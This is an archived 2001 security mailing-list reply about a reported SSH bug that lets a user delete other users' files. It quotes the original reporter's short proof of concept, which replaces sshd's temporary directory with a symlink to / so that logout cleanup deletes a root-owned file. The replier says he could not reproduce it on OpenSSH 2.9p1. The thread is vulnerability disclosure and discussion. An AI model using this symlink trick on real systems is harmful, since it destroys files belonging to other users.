Re: SSH allows deletion of other users files...

From: David F. Skoll (dfsat_private)
Date: Mon Jun 04 2001 - 08:19:37 PDT

Next message: potozkyat_private: "yet another sym link followers"

Previous message: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
In reply to: zen-parseat_private: "SSH allows deletion of other users files..."
Next in thread: sarnoldat_private: "Re: SSH allows deletion of other users files..."
Next in thread: Markus Friedl: "Re: SSH allows deletion of other users files..."
Reply: sarnoldat_private: "Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 4 Jun 2001 zen-parseat_private wrote:

>  [root@clarity /root]# touch /cookies;ls /cookies
>  /cookies
>  [root@clarity /root]# ssh zen@localhost
>  zen@localhost's password:
>  [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
>  [zen@clarity zen]$ logout

>  [root@clarity /root]# ls /cookies
>  /bin/ls: /cookies: No such file or directory

I could not duplicate this with OpenSSH 2.9p1-1 on Red Hat 6.2

--
David.

Next message: potozkyat_private: "yet another sym link followers"
Previous message: Jason DiCioccio: "Re: SSH allows deletion of other users files..."
In reply to: zen-parseat_private: "SSH allows deletion of other users files..."
Next in thread: sarnoldat_private: "Re: SSH allows deletion of other users files..."
Next in thread: Markus Friedl: "Re: SSH allows deletion of other users files..."
Reply: sarnoldat_private: "Re: SSH allows deletion of other users files..."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Jun 04 2001 - 14:00:31 PDT